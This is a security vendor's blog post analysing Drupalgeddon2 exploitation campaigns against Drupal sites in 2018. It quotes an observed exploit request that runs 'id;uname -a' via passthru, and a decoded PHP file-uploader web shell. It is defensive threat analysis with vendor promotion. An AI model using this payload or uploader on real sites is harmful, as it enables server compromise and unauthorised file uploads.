Drupalgeddon 2.0: Analyst’s Insight

For Hosting Providers

Oleg Boytsev

Friday, 19 October 2018

0 Comments

Activity

Our monitoring systems identified a first-wave malicious campaign on April 12th, 2018, the same day that proof of concept code went public.

The Drupal core security team had earlier released security advisory SA-CORE–2018–002 on the 28th March. We released our blocking and detection rules a few days later meaning that Imunify360 customers were already protected by the time the campaign started.

October saw a new burst of attacks on this vector. Botnets located on thousands of IPs requested access to Drupal-based sites to upload a malicious payload. The chart below shows the activity levels for the past few months.

Recognition

Most connections were attempting to extract the server's Linux kernel version and user ID through this request:

node?q[%23][]=passthru&q[%23type]=markup&q[%23markup]=id;uname -a

Other payloads were seen with base64 encoding in the file sites/default/files/xv.php. Decoded, they look like a common file uploader:

<?php echo "xin0x g4me"; move_uploaded_file($_FILES['f']['tmp_name'], $_FILES['f']['name']); ?>

Mitigation

Both the Imunify360 WAF ruleset and Proactive Defense heuristics were updated to detect and block this exploit, code-named Drupalgeddon2 (CVE–2018–7600) and a variation, Drupalgeddon3 (CVE–2018–7602).

Compared to vendor-specific and free WAF rules available online, our rules are much more difficult to circumvent.

Imunify360 is the best choice for your all-in-one security protection needs.

Oleg Boytsev is an analyst in the Imunify360 Threat Intelligence Group.

About the author

Oleg Boytsev

Oleg is a CloudLinux Security Researcher and Bug Hunter, and holder of a Offensive Security Certified Professional (OSCP) certification.

Author's recent posts

Comments

No comments made yet. Be the first to submit a comment